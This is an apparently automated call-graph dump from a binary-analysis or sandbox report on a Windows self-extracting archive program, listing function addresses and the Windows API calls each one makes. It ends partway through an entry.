8319d0 26 API calls std::bad_exception::bad_exception 23917 8210d5 23922 825bd7 23917->23922 23923 825be1 __EH_prolog 23922->23923 23929 82b07d 23923->23929 23925 825bed 23935 825dcc GetCurrentProcess GetProcessAffinityMask 23925->23935 23930 82b087 __EH_prolog 23929->23930 23936 82ea80 80 API calls 23930->23936 23932 82b099 23937 82b195 23932->23937 23936->23932 23938 82b1a7 ___scrt_get_show_window_mode 23937->23938 23941 830948 23938->23941 23944 830908 GetCurrentProcess GetProcessAffinityMask 23941->23944 23945 82b10f 23944->23945 23945->23925 23959 83aee0 23960 83aeea __EH_prolog 23959->23960 24122 82130b 23960->24122 23963 83af18 23964 83b5cb 24187 83cd2e 23964->24187 23965 83af2c 23965->23963 23968 83afa2 23965->23968 23969 83af39 23965->23969 23972 83b041 GetDlgItemTextW 23968->23972 23978 83afbc 23968->23978 23973 83af75 23969->23973 23974 83af3e 23969->23974 23970 83b5f7 23976 83b611 GetDlgItem SendMessageW 23970->23976 23977 83b600 SendDlgItemMessageW 23970->23977 23971 83b5e9 SendMessageW 23971->23970 23972->23973 23975 83b077 23972->23975 23973->23963 23979 83af96 EndDialog 23973->23979 23974->23963 23983 82ddd1 53 API calls 23974->23983 23980 83b08f GetDlgItem 23975->23980 23989 83b080 23975->23989 24205 839da4 GetCurrentDirectoryW 23976->24205 23977->23976 23982 82ddd1 53 API calls 23978->23982 23979->23963 23985 83b0c5 SetFocus 23980->23985 23986 83b0a4 SendMessageW SendMessageW 23980->23986 23987 83afde SetDlgItemTextW 23982->23987 23988 83af58 23983->23988 23984 83b641 GetDlgItem 23990 83b664 SetWindowTextW 23984->23990 23991 83b65e 23984->23991 23992 83b0d5 23985->23992 24004 83b0ed 23985->24004 23986->23985 23993 83afec 23987->23993 24227 821241 SHGetMalloc 23988->24227 23989->23973 23995 83b56b 23989->23995 24206 83a2c7 GetClassNameW 23990->24206 23991->23990 23997 82ddd1 53 API calls 23992->23997 23993->23963 24003 83aff9 GetMessageW 23993->24003 24000 82ddd1 53 API calls 23995->24000 24002 83b0df 23997->24002 23998 83af5f 23998->23963 23999 83af63 SetDlgItemTextW 23998->23999 23999->23963 24005 83b57b SetDlgItemTextW 24000->24005 24228 83cb5a 24002->24228 24003->23963 24008 83b010 IsDialogMessageW 24003->24008 24012 82ddd1 53 API calls 24004->24012 24009 83b58f 24005->24009 24008->23993 24011 83b01f TranslateMessage DispatchMessageW 24008->24011 24014 82ddd1 53 API calls 24009->24014 24011->23993 24013 83b124 24012->24013 24018 82400a _swprintf 51 API calls 24013->24018 24019 83b5b8 24014->24019 24015 83b6af 24017 83b6df 24015->24017 24022 82ddd1 53 API calls 24015->24022 24016 83bdf5 98 API calls 24016->24015 24028 83bdf5 98 API calls 24017->24028 24059 83b797 24017->24059 24023 83b136 24018->24023 24024 82ddd1 53 API calls 24019->24024 24020 83b0e6 24132 82a04f 24020->24132 24026 83b6c2 SetDlgItemTextW 24022->24026 24027 83cb5a 16 API calls 24023->24027 24024->23963 24033 82ddd1 53 API calls 24026->24033 24027->24020 24034 83b6fa 24028->24034 24029 83b847 24035 83b850 EnableWindow 24029->24035 24036 83b859 24029->24036 24030 83b174 GetLastError 24031 83b17f 24030->24031 24138 83a322 SetCurrentDirectoryW 24031->24138 24039 83b6d6 SetDlgItemTextW 24033->24039 24045 83b70c 24034->24045 24060 83b731 24034->24060 24035->24036 24037 83b876 24036->24037 24246 8212c8 GetDlgItem EnableWindow 24036->24246 24044 83b89d 24037->24044 24051 83b895 SendMessageW 24037->24051 24038 83b195 24042 83b1ac 24038->24042 24043 83b19e GetLastError 24038->24043 24039->24017 24041 83b78a 24047 83bdf5 98 API calls 24041->24047 24050 83b227 24042->24050 24054 83b237 24042->24054 24056 83b1c4 GetTickCount 24042->24056 24043->24042 24044->23963 24052 82ddd1 53 API calls 24044->24052 24244 839635 32 API calls 24045->24244 24046 83b86c 24247 8212c8 GetDlgItem EnableWindow 24046->24247 24047->24059 24050->24054 24055 83b46c 24050->24055 24051->24044 24058 83b8b6 SetDlgItemTextW 24052->24058 24053 83b725 24053->24060 24062 83b407 24054->24062 24063 83b24f GetModuleFileNameW 24054->24063 24147 8212e6 GetDlgItem ShowWindow 24055->24147 24064 82400a _swprintf 51 API calls 24056->24064 24057 83b825 24245 839635 32 API calls 24057->24245 24058->23963 24059->24029 24059->24057 24066 82ddd1 53 API calls 24059->24066 24060->24041 24067 83bdf5 98 API calls 24060->24067 24062->23973 24075 82ddd1 53 API calls 24062->24075 24238 82eb3a 80 API calls 24063->24238 24070 83b1dd 24064->24070 24066->24059 24072 83b75f 24067->24072 24068 83b47c 24148 8212e6 GetDlgItem ShowWindow 24068->24148 24139 82971e 24070->24139 24071 83b844 24071->24029 24072->24041 24076 83b768 DialogBoxParamW 24072->24076 24074 83b275 24078 82400a _swprintf 51 API calls 24074->24078 24079 83b41b 24075->24079 24076->23973 24076->24041 24077 83b486 24080 82ddd1 53 API calls 24077->24080 24081 83b297 CreateFileMappingW 24078->24081 24082 82400a _swprintf 51 API calls 24079->24082 24084 83b490 SetDlgItemTextW 24080->24084 24085 83b2f9 GetCommandLineW 24081->24085 24117 83b376 __vswprintf_c_l 24081->24117 24086 83b439 24082->24086 24149 8212e6 GetDlgItem ShowWindow 24084->24149 24092 83b30a 24085->24092 24096 82ddd1 53 API calls 24086->24096 24087 83b203 24088 83b20a GetLastError 24087->24088 24089 83b215 24087->24089 24088->24089 24094 829653 79 API calls 24089->24094 24090 83b381 ShellExecuteExW 24112 83b39e 24090->24112 24239 83ab2e SHGetMalloc 24092->24239 24094->24050 24095 83b4a2 SetDlgItemTextW GetDlgItem 24098 83b4d7 24095->24098 24099 83b4bf GetWindowLongW SetWindowLongW 24095->24099 24096->23973 24097 83b326 24240 83ab2e SHGetMalloc 24097->24240 24150 83bdf5 24098->24150 24099->24098 24103 83b332 24241 83ab2e SHGetMalloc 24103->24241 24104 83b3e1 24104->24062 24111 83b3f7 UnmapViewOfFile CloseHandle 24104->24111 24105 83bdf5 98 API calls 24107 83b4f3 24105->24107 24175 83d0f5 24107->24175 24108 83b33e 24242 82ecad 80 API calls ___scrt_get_show_window_mode 24108->24242 24111->24062 24112->24104 24115 83b3cd Sleep 24112->24115 24114 83b355 MapViewOfFile 24114->24117 24115->24104 24115->24112 24116 83bdf5 98 API calls 24120 83b519 24116->24120 24117->24090 24118 83b542 24243 8212c8 GetDlgItem EnableWindow 24118->24243 24120->24118 24121 83bdf5 98 API calls 24120->24121 24121->24118 24123 821314 24122->24123 24124 82136d 24122->24124 24125 82137a 24123->24125 24248 82da98 62 API calls 2 library calls 24123->24248 24249 82da71 GetWindowLongW SetWindowLongW 24124->24249 24125->23963 24125->23964 24125->23965 24128 821336 24128->24125 24129 821349 GetDlgItem 24128->24129 24129->24125 24130 821359 24129->24130 24130->24125 24131 82135f SetWindowTextW 24130->24131 24131->24125 24135 82a059 24132->24135 24133 82a0ea 24134 82a207 9 API calls 24133->24134 24136 82a113 24133->24136 24134->24136 24135->24133 24135->24136 24250 82a207 24135->24250 24136->24030 24136->24031 24138->24038 24140 829728 24139->24140 24141 829792 CreateFileW 24140->24141 24142 829786 24140->24142 24141->24142 24143 8297e4 24142->24143 24144 82b66c 2 API calls 24142->24144 24143->24087 24145 8297cb 24144->24145 24145->24143 24146 8297cf CreateFileW 24145->24146 24146->24143 24147->24068 24148->24077 24149->24095 24151 83bdff __EH_prolog 24150->24151 24152 83b4e5 24151->24152 24153 83aa36 ExpandEnvironmentStringsW 24151->24153 24152->24105 24159 83be36 _wcsrchr 24153->24159 24155 83aa36 ExpandEnvironmentStringsW 24155->24159 24156 83c11d SetWindowTextW 24156->24159 24159->24152 24159->24155 24159->24156 24160 8435de 22 API calls 24159->24160 24162 83bf0b SetFileAttributesW 24159->24162 24168 83c2e7 GetDlgItem SetWindowTextW SendMessageW 24159->24168 24170 83c327 SendMessageW 24159->24170 24271 8317ac CompareStringW 24159->24271 24272 839da4 GetCurrentDirectoryW 24159->24272 24274 82a52a 7 API calls 24159->24274 24275 82a4b3 FindClose 24159->24275 24276 83ab9a 76 API calls ___std_exception_copy 24159->24276 24160->24159 24164 83bfc5 GetFileAttributesW 24162->24164 24174 83bf25 ___scrt_get_show_window_mode 24162->24174 24164->24159 24166 83bfd7 DeleteFileW 24164->24166 24166->24159 24167 83bfe8 24166->24167 24169 82400a _swprintf 51 API calls 24167->24169 24168->24159 24171 83c008 GetFileAttributesW 24169->24171 24170->24159 24171->24167 24172 83c01d MoveFileW 24171->24172 24172->24159 24173 83c035 MoveFileExW 24172->24173 24173->24159 24174->24159 24174->24164 24273 82b4f7 52 API calls 2 library calls 24174->24273 24176 83d0ff __EH_prolog 24175->24176 24277 82fead 24176->24277 24178 83d130 24281 825c59 24178->24281 24180 83d14e 24285 827c68 24180->24285 24184 83d1a1 24302 827cfb 24184->24302 24186 83b504 24186->24116 24188 83cd38 24187->24188 24189 839d1a 4 API calls 24188->24189 24190 83cd3d 24189->24190 24191 83b5d1 24190->24191 24192 83cd45 GetWindow 24190->24192 24191->23970 24191->23971 24192->24191 24193 83cd65 24192->24193 24193->24191 24194 83cd72 GetClassNameW 24193->24194 24196 83cd96 GetWindowLongW 24193->24196 24197 83cdfa GetWindow 24193->24197 24736 8317ac CompareStringW 24194->24736 24196->24197 24198 83cda6 SendMessageW 24196->24198 24197->24191 24197->24193 24198->24197 24199 83cdbc GetObjectW 24198->24199 24737 839d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24199->24737 24201 83cdd3 24738 839d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24201->24738 24739 839f5d 8 API calls ___scrt_get_show_window_mode 24201->24739 24204 83cde4 SendMessageW DeleteObject 24204->24197 24205->23984 24207 83a2e8 24206->24207 24208 83a30d 24206->24208 24740 8317ac CompareStringW 24207->24740 24210 83a312 SHAutoComplete 24208->24210 24211 83a31b 24208->24211 24210->24211 24214 83a7c3 24211->24214 24212 83a2fb 24212->24208 24213 83a2ff FindWindowExW 24212->24213 24213->24208 24215 83a7cd __EH_prolog 24214->24215 24216 821380 82 API calls 24215->24216 24217 83a7ef 24216->24217 24741 821f4f 24217->24741 24220 83a809 24222 821631 84 API calls 24220->24222 24221 83a818 24223 821951 126 API calls 24221->24223 24224 83a814 24222->24224 24225 83a83a __vswprintf_c_l ___std_exception_copy 24223->24225 24224->24015 24224->24016 24225->24224 24226 821631 84 API calls 24225->24226 24226->24224 24227->23998 24749 83ac74 PeekMessageW 24228->24749 24231 83cbbc SendMessageW SendMessageW 24233 83cc17 SendMessageW SendMessageW SendMessageW 24231->24233 24234 83cbf8 24231->24234 24232 83cb88 24235 83cb93 ShowWindow SendMessageW SendMessageW 24232->24235 24236 83cc4a SendMessageW 24233->24236 24237 83cc6d SendMessageW 24233->24237 24234->24233 24235->24231 24236->24237 24237->24020 24238->24074 24239->24097 24240->24103 24241->24108 24242->24114 24243->23989 24244->24053 24245->24071 24246->24046 24247->24037 24248->24128 24249->24125 24251 82a214 24250->24251 24252 82a238 24251->24252 24253 82a22b CreateDirectoryW 24251->24253 24254 82a180 4 API calls 24252->24254 24253->24252 24255 82a26b 24253->24255 24256 82a23e 24254->24256 24258 82a27a 24255->24258 24263 82a444 24255->24263 24257 82a27e GetLastError 24256->24257 24259 82b66c 2 API calls 24256->24259 24257->24258 24258->24135 24261 82a254 24259->24261 24261->24257 24262 82a258 CreateDirectoryW 24261->24262 24262->24255 24262->24257 24264 83e360 24263->24264 24265 82a451 SetFileAttributesW 24264->24265 24266 82a467 24265->24266 24267 82a494 24265->24267 24268 82b66c 2 API calls 24266->24268 24267->24258 24269 82a47b 24268->24269 24269->24267 24270 82a47f SetFileAttributesW 24269->24270 24270->24267 24271->24159 24272->24159 24273->24174 24274->24159 24275->24159 24276->24159 24278 82feba 24277->24278 24306 821789 24278->24306 24280 82fed2 24280->24178 24282 82fead 24281->24282 24283 821789 76 API calls 24282->24283 24284 82fed2 24283->24284 24284->24180 24286 827c72 __EH_prolog 24285->24286 24323 82c827 24286->24323 24288 827c8d 24289 83e24a new 8 API calls 24288->24289 24290 827cb7 24289->24290 24329 83440b 24290->24329 24293 827ddf 24294 827de9 24293->24294 24296 827e53 24294->24296 24358 82a4c6 24294->24358 24297 827ec4 24296->24297 24300 82a4c6 8 API calls 24296->24300 24336 82837f 24296->24336 24301 827f06 24297->24301 24364 826dc1 74 API calls 24297->24364 24300->24296 24301->24184 24303 827d09 24302->24303 24305 827d10 24302->24305 24304 831acf 84 API calls 24303->24304 24304->24305 24307 82179f 24306->24307 24318 8217fa __vswprintf_c_l 24306->24318 24308 8217c8 24307->24308 24319 826e91 74 API calls __vswprintf_c_l 24307->24319 24309 821827 24308->24309 24315 8217e7 ___std_exception_copy 24308->24315 24312 8435de 22 API calls 24309->24312 24311 8217be 24320 826efd 75 API calls 24311->24320 24314 82182e 24312->24314 24314->24318 24322 826efd 75 API calls 24314->24322 24315->24318 24321 826efd 75 API calls 24315->24321 24318->24280 24319->24311 24320->24308 24321->24318 24322->24318 24324 82c831 __EH_prolog 24323->24324 24325 83e24a new 8 API calls 24324->24325 24327 82c874 24325->24327 24326 83e24a new 8 API calls 24328 82c898 24326->24328 24327->24326 24328->24288 24330 834415 __EH_prolog 24329->24330 24331 83e24a new 8 API calls 24330->24331 24332 834431 24331->24332 24333 827ce6 24332->24333 24335 8306ba 78 API calls 24332->24335 24333->24293 24335->24333 24337 828389 __EH_prolog 24336->24337 24365 821380 24337->24365 24339 8283a4 24373 829ef7 24339->24373 24342 8283d3 24493 821631 24342->24493 24346 82846e 24392 828517 24346->24392 24350 8284ce 24396 821f00 24350->24396 24353 8283cf 24353->24342 24353->24346 24356 82a4c6 8 API calls 24353->24356 24497 82bac4 CompareStringW 24353->24497 24354 8284d9 24354->24342 24400 823aac 24354->24400 24410 82857b 24354->24410 24356->24353 24359 82a4db 24358->24359 24360 82a4df 24359->24360 24724 82a5f4 24359->24724 24360->24294 24362 82a4ef 24362->24360 24363 82a4f4 FindClose 24362->24363 24363->24360 24364->24301 24366 821385 __EH_prolog 24365->24366 24367 82c827 8 API calls 24366->24367 24368 8213bd 24367->24368 24369 83e24a new 8 API calls 24368->24369 24372 821416 ___scrt_get_show_window_mode 24368->24372 24370 821403 24369->24370 24371 82b07d 82 API calls 24370->24371 24370->24372 24371->24372 24372->24339 24374 829f0e 24373->24374 24375 8283ba 24374->24375 24499 826f5d 76 API calls 24374->24499 24375->24342 24377 8219a6 24375->24377 24378 8219b0 __EH_prolog 24377->24378 24389 821a00 24378->24389 24391 8219e5 24378->24391 24500 82709d 24378->24500 24380 821b50 24503 826dc1 74 API calls 24380->24503 24382 823aac 97 API calls 24385 821bb3 24382->24385 24383 821b60 24383->24382 24383->24391 24384 821bff 24390 821c32 24384->24390 24384->24391 24504 826dc1 74 API calls 24384->24504 24385->24384 24387 823aac 97 API calls 24385->24387 24387->24385 24388 823aac 97 API calls 24388->24390 24389->24380 24389->24383 24389->24391 24390->24388 24390->24391 24391->24353 24393 828524 24392->24393 24522 830c26 GetSystemTime SystemTimeToFileTime 24393->24522 24395 828488 24395->24350 24498 831359 72 API calls 24395->24498 24397 821f05 __EH_prolog 24396->24397 24399 821f39 24397->24399 24524 821951 24397->24524 24399->24354 24401 823ab8 24400->24401 24402 823abc 24400->24402 24401->24354 24403 823af7 24402->24403 24404 823ae9 24402->24404 24659 8227e8 97 API calls 3 library calls 24403->24659 24405 823b29 24404->24405 24658 823281 85 API calls 3 library calls 24404->24658 24405->24354 24408 823af5 24408->24405 24660 82204e 74 API calls 24408->24660 24411 828585 __EH_prolog 24410->24411 24412 8285be 24411->24412 24424 8285c2 24411->24424 24683 8384bd 99 API calls 24411->24683 24413 8285e7 24412->24413 24418 82867a 24412->24418 24412->24424 24414 828609 24413->24414 24413->24424 24684 827b66 151 API calls 24413->24684 24414->24424 24685 8384bd 99 API calls 24414->24685 24418->24424 24661 825e3a 24418->24661 24420 828705 24420->24424 24667 82826a 24420->24667 24423 828875 24425 82a4c6 8 API calls 24423->24425 24426 8288e0 24423->24426 24424->24354 24425->24426 24671 827d6c 24426->24671 24428 82c991 80 API calls 24431 82893b _memcmp 24428->24431 24429 828a70 24430 828b43 24429->24430 24437 828abf 24429->24437 24435 828b9e 24430->24435 24445 828b4e 24430->24445 24431->24424 24431->24428 24431->24429 24432 828a69 24431->24432 24686 828236 82 API calls 24431->24686 24687 821f94 74 API calls 24431->24687 24688 821f94 74 API calls 24432->24688 24444 828b30 24435->24444 24691 8280ea 96 API calls 24435->24691 24436 828b9c 24438 829653 79 API calls 24436->24438 24439 82a180 4 API calls 24437->24439 24437->24444 24438->24424 24442 828af7 24439->24442 24441 829653 79 API calls 24441->24424 24442->24444 24689 829377 96 API calls 24442->24689 24443 828c09 24447 829989 GetFileType 24443->24447 24457 828c74 24443->24457 24483 8291c1 ___InternalCxxFrameHandler 24443->24483 24444->24436 24444->24443 24445->24436 24690 827f26 100 API calls ___InternalCxxFrameHandler 24445->24690 24446 82aa88 8 API calls 24449 828cc3 24446->24449 24451 828c4c 24447->24451 24452 82aa88 8 API calls 24449->24452 24451->24457 24692 821f94 74 API calls 24451->24692 24454 828cd9 24452->24454 24458 828d9c 24454->24458 24694 829b21 SetFilePointer GetLastError SetEndOfFile 24454->24694 24455 828c62 24693 827061 75 API calls 24455->24693 24457->24446 24459 828efd 24458->24459 24460 828df7 24458->24460 24464 828f23 24459->24464 24465 828f0f 24459->24465 24480 828e27 24459->24480 24461 828e69 24460->24461 24462 828e07 24460->24462 24463 82826a CharUpperW 24461->24463 24467 828e4d 24462->24467 24474 828e15 24462->24474 24468 828e84 24463->24468 24466 832c42 75 API calls 24464->24466 24469 8292e6 121 API calls 24465->24469 24470 828f3c 24466->24470 24467->24480 24696 827907 108 API calls 24467->24696 24476 828eb4 24468->24476 24477 828ead 24468->24477 24468->24480 24469->24480 24699 8328f1 121 API calls 24470->24699 24695 821f94 74 API calls 24474->24695 24698 829224 94 API calls __EH_prolog 24476->24698 24697 827698 84 API calls ___InternalCxxFrameHandler 24477->24697 24484 82904b 24480->24484 24700 821f94 74 API calls 24480->24700 24482 829156 24482->24483 24485 82a444 4 API calls 24482->24485 24483->24441 24484->24482 24484->24483 24486 829104 24484->24486 24677 829ebf SetEndOfFile 24484->24677 24487 8291b1 24485->24487 24678 829d62 24486->24678 24487->24483 24701 821f94 74 API calls 24487->24701 24490 82914b 24492 8296d0 75 API calls 24490->24492 24492->24482 24494 821643 24493->24494 24716 82c8ca 24494->24716 24497->24353 24498->24350 24499->24375 24505 8216d2 24500->24505 24502 8270b9 24502->24389 24503->24391 24504->24390 24506 8216e8 24505->24506 24517 821740 __vswprintf_c_l 24505->24517 24507 821711 24506->24507 24518 826e91 74 API calls __vswprintf_c_l 24506->24518 24509 821767 24507->24509 24514 82172d ___std_exception_copy 24507->24514 24511 8435de 22 API calls 24509->24511 24510 821707 24519 826efd 75 API calls 24510->24519 24513 82176e 24511->24513 24513->24517 24521 826efd 75 API calls 24513->24521 24514->24517 24520 826efd 75 API calls 24514->24520 24517->24502 24518->24510 24519->24507 24520->24517 24521->24517 24523 830c56 __vswprintf_c_l 24522->24523 24523->24395 24525 821961 24524->24525 24527 82195d 24524->24527 24528 821896 24525->24528 24527->24399 24529 8218e5 24528->24529 24530 8218a8 24528->24530 24536 823f18 24529->24536 24531 823aac 97 API calls 24530->24531 24534 8218c8 24531->24534 24534->24527 24540 823f21 24536->24540 24537 823aac 97 API calls 24537->24540 24538 821906 24538->24534 24541 821e00 24538->24541 24540->24537 24540->24538 24553 83067c 24540->24553 24542 821e0a __EH_prolog 24541->24542 24561 823b3d 24542->24561 24544 821e34 24545 8216d2 76 API calls 24544->24545 24547 821ebb 24544->24547 24546 821e4b 24545->24546 24589 821849 76 API calls 24546->24589 24547->24534 24549 821e63 24550 821e6f 24549->24550 24590 83137a MultiByteToWideChar 24549->24590 24591 821849 76 API calls 24550->24591 24554 830683 24553->24554 24556 83069e 24554->24556 24559 826e8c RaiseException Concurrency::cancel_current_task 24554->24559 24557 8306af SetThreadExecutionState 24556->24557 24560 826e8c RaiseException Concurrency::cancel_current_task 24556->24560 24557->24540 24559->24556 24560->24557 24562 823b47 __EH_prolog 24561->24562 24563 823b79 24562->24563 24564 823b5d 24562->24564 24566 823dc2 24563->24566 24569 823ba5 24563->24569 24620 826dc1 74 API calls 24564->24620 24637 826dc1 74 API calls 24566->24637 24568 823b68 24568->24544 24569->24568 24592 832c42 24569->24592 24571 823c26 24572 823cb1 24571->24572 24588 823c1d 24571->24588 24623 82c991 24571->24623 24605 82aa88 24572->24605 24573 823c22 24573->24571 24622 822034 76 API calls 24573->24622 24575 823c12 24621 826dc1 74 API calls 24575->24621 24576 823bf4 24576->24571 24576->24573 24576->24575 24578 823cc4 24582 823d48 24578->24582 24583 823d3e 24578->24583 24629 8328f1 121 API calls 24582->24629 24609 8292e6 24583->24609 24586 823d46 24586->24588 24630 821f94 74 API calls 24586->24630 24631 831acf 24588->24631 24589->24549 24590->24550 24591->24547 24593 832c51 24592->24593 24595 832c5b 24592->24595 24638 826efd 75 API calls 24593->24638 24597 832ca2 ___std_exception_copy 24595->24597 24598 832c9d Concurrency::cancel_current_task 24595->24598 24602 832cfd ___scrt_get_show_window_mode 24595->24602 24596 832da9 Concurrency::cancel_current_task 24641 84157a RaiseException 24596->24641 24597->24596 24597->24602 24604 832cd9 24597->24604 24640 84157a RaiseException 24598->24640 24602->24576 24603 832dc1 24639 832b7b 75 API calls 3 library calls 24604->24639 24606 82aa95 24605->24606 24608 82aa9f 24605->24608 24607 83e24a new 8 API calls 24606->24607 24607->24608 24608->24578 24610 8292f0 __EH_prolog 24609->24610 24642 827dc6 24610->24642 24613 82709d 76 API calls 24614 829302 24613->24614 24645 82ca6c 24614->24645 24617 82ca6c 114 API calls 24618 829314 24617->24618 24618->24617 24619 82935c 24618->24619 24654 82cc51 97 API calls __vswprintf_c_l 24618->24654 24619->24586 24620->24568 24621->24588 24622->24571 24624 82c9b2 24623->24624 24625 82c9c4 24623->24625 24655 826249 80 API calls 24624->24655 24656 826249 80 API calls 24625->24656 24628 82c9bc 24628->24572 24629->24586 24630->24588 24632 831ad9 24631->24632 24633 831af2 24632->24633 24636 831b06 24632->24636 24657 83075b 84 API calls 24633->24657 24635 831af9 24635->24636 24637->24568 24638->24595 24639->24602 24640->24596 24641->24603 24643 82acf5 GetVersionExW 24642->24643 24644 827dcb 24643->24644 24644->24613 24649 82ca82 __vswprintf_c_l 24645->24649 24646 82cbf7 24647 82cc1f 24646->24647 24648 82ca0b 6 API calls 24646->24648 24650 83067c SetThreadExecutionState RaiseException 24647->24650 24648->24647 24649->24646 24651 8384bd 99 API calls 24649->24651 24652 82cbee 24649->24652 24653 82ab70 89 API calls 24649->24653 24650->24652 24651->24649 24652->24618 24653->24649 24654->24618 24655->24628 24656->24628 24657->24635 24658->24408 24659->24408 24660->24405 24662 825e4a 24661->24662 24702 825d67 24662->24702 24664 825e7d 24666 825eb5 24664->24666 24707 82ad65 CharUpperW CompareStringW 24664->24707 24666->24420 24668 828289 24667->24668 24713 83179d CharUpperW 24668->24713 24670 828333 24670->24423 24672 827d7b 24671->24672 24673 827dbb 24672->24673 24714 827043 74 API calls 24672->24714 24673->24431 24675 827db3 24715 826dc1 74 API calls 24675->24715 24677->24486 24679 829d73 24678->24679 24682 829d82 24678->24682 24680 829d79 FlushFileBuffers 24679->24680 24679->24682 24680->24682 24681 829dfb SetFileTime 24681->24490 24682->24681 24683->24412 24684->24414 24685->24424 24686->24431 24687->24431 24688->24429 24689->24444 24690->24436 24691->24444 24692->24455 24693->24457 24694->24458 24695->24480 24696->24480 24697->24480 24698->24480 24699->24480 24700->24484 24701->24483 24708 825c64 24702->24708 24704 825d88 24704->24664 24706 825c64 2 API calls 24706->24704 24707->24664 24711 825c6e 24708->24711 24709 825d56 24709->24704 24709->24706 24711->24709 24712 82ad65 CharUpperW CompareStringW 24711->24712 24712->24711 24713->24670 24714->24675 24715->24673 24719 82c8db 24716->24719 24718 82c90d 24723 82a90e 84 API calls 24718->24723 24722 82a90e 84 API calls 24719->24722 24721 82c918 24722->24718 24723->24721 24725 82a5fe 24724->24725 24726 82a691 FindNextFileW 24725->24726 24727 82a621 FindFirstFileW 24725->24727 24729 82a6b0 24726->24729 24730 82a69c GetLastError 24726->24730 24728 82a638 24727->24728 24735 82a675 24727->24735 24731 82b66c 2 API calls 24728->24731 24729->24735 24730->24729 24732 82a64d 24731->24732 24733 82a651 FindFirstFileW 24732->24733 24734 82a66a GetLastError 24732->24734 24733->24734 24733->24735 24734->24735 24735->24362 24736->24193 24737->24201 24738->24201 24739->24204 24740->24212 24742 829ef7 76 API calls 24741->24742 24743 821f5b 24742->24743 24744 8219a6 97 API calls 24743->24744 24747 821f78 24743->24747 24745 821f68 24744->24745 24745->24747 24748 826dc1 74 API calls 24745->24748 24747->24220 24747->24221 24748->24747 24750 83acc8 GetDlgItem 24749->24750 24751 83ac8f GetMessageW 24749->24751 24750->24231 24750->24232 24752 83aca5 IsDialogMessageW 24751->24752 24753 83acb4 TranslateMessage DispatchMessageW 24751->24753 24752->24750 24752->24753 24753->24750 24801 83b8e0 93 API calls _swprintf 24802 838ce0 CompareStringW ShowWindow SetWindowTextW GlobalAlloc WideCharToMultiByte 24805 8516e0 CloseHandle 24853 83ebf7 20 API calls 24855 84abfd 6 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 24770 83e1f9 24771 83e203 24770->24771 24772 83df59 ___delayLoadHelper2@8 19 API calls 24771->24772 24773 83e210 24772->24773 22881 83db01 22882 83daaa 22881->22882 22884 83df59 22882->22884 22912 83dc67 22884->22912 22886 83df73 22887 83dfd0 22886->22887 22891 83dff4 22886->22891 22888 83ded7 DloadReleaseSectionWriteAccess 11 API calls 22887->22888 22889 83dfdb RaiseException 22888->22889 22890 83e1c9 22889->22890 22931 83ec4a 22890->22931 22893 83e06c LoadLibraryExA 22891->22893 22896 83e0cd 22891->22896 22899 83e0df 22891->22899 22908 83e19b 22891->22908 22895 83e07f GetLastError 22893->22895 22893->22896 22894 83e1d8 22894->22882 22897 83e092 22895->22897 22898 83e0a8 22895->22898 22896->22899 22901 83e0d8 FreeLibrary 22896->22901 22897->22896 22897->22898 22902 83ded7 DloadReleaseSectionWriteAccess 11 API calls 22898->22902 22900 83e13d GetProcAddress 22899->22900 22899->22908 22903 83e14d GetLastError 22900->22903 22900->22908 22901->22899 22904 83e0b3 RaiseException 22902->22904 22905 83e160 22903->22905 22904->22890 22907 83ded7 DloadReleaseSectionWriteAccess 11 API calls 22905->22907 22905->22908 22909 83e181 RaiseException 22907->22909 22923 83ded7 22908->22923 22910 83dc67 ___delayLoadHelper2@8 11 API calls 22909->22910 22911 83e198 22910->22911 22911->22908 22913 83dc73 22912->22913 22914 83dc99 22912->22914 22938 83dd15 22913->22938 22914->22886 22917 83dc94 22948 83dc9a 22917->22948 22920 83ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 22921 83df55 22920->22921 22921->22886 22922 83df24 22922->22920 22924 83df0b 22923->22924 22925 83dee9 22923->22925 22924->22890 22926 83dd15 DloadLock 8 API calls 22925->22926 22927 83deee 22926->22927 22928 83df06 22927->22928 22929 83de67 DloadProtectSection 3 API calls 22927->22929 22957 83df0f 8 API calls 2 library calls 22928->22957 22929->22928 22932 83ec53 22931->22932 22933 83ec55 IsProcessorFeaturePresent 22931->22933 22932->22894 22935 83f267 22933->22935 22958 83f22b SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 22935->22958 22937 83f34a 22937->22894 22939 83dc9a DloadLock 3 API calls 22938->22939 22940 83dd2a 22939->22940 22941 83ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 22940->22941 22942 83dc78 22941->22942 22942->22917 22943 83de67 22942->22943 22944 83de7c DloadObtainSection 22943->22944 22945 83deb7 VirtualProtect 22944->22945 22946 83de82 22944->22946 22956 83dd72 VirtualQuery GetSystemInfo 22944->22956 22945->22946 22946->22917 22949 83dca7 22948->22949 22950 83dcab 22948->22950 22949->22922 22951 83dcb3 GetModuleHandleW 22950->22951 22952 83dcaf 22950->22952 22953 83dcc9 GetProcAddress 22951->22953 22955 83dcc5 22951->22955 22952->22922 22954 83dcd9 GetProcAddress 22953->22954 22953->22955 22954->22955 22955->22922 22956->22945 22957->22924 22958->22937 24808 83ea00 46 API calls 6 library calls 24856 821f05 126 API calls __EH_prolog 24809 83ec0b 28 API calls 2 library calls 24858 83db0b 19 API calls ___delayLoadHelper2@8 22962 83c40e 22963 83c42c _wcschr 22962->22963 22965 83c4c7 22962->22965 22963->22965 22971 8317ac CompareStringW 22963->22971 22964 83c4e5 22968 83ce22 18 API calls 22964->22968 22980 83be49 _wcsrchr 22964->22980 22965->22964 22965->22980 23017 83ce22 22965->23017 22968->22980 22969 83ca8d 22971->22963 22972 83c11d SetWindowTextW 22972->22980 22977 83bf0b SetFileAttributesW 22979 83bfc5 GetFileAttributesW 22977->22979 22990 83bf25 ___scrt_get_show_window_mode 22977->22990 22979->22980 22982 83bfd7 DeleteFileW 22979->22982 22980->22969 22980->22972 22980->22977 22984 83c2e7 GetDlgItem SetWindowTextW SendMessageW 22980->22984 22986 83c327 SendMessageW 22980->22986 22991 8317ac CompareStringW 22980->22991 22992 83aa36 22980->22992 22996 839da4 GetCurrentDirectoryW 22980->22996 23001 82a52a 7 API calls 22980->23001 23002 82a4b3 FindClose 22980->23002 23003 83ab9a 76 API calls ___std_exception_copy 22980->23003 23004 8435de 22980->23004 22982->22980 22983 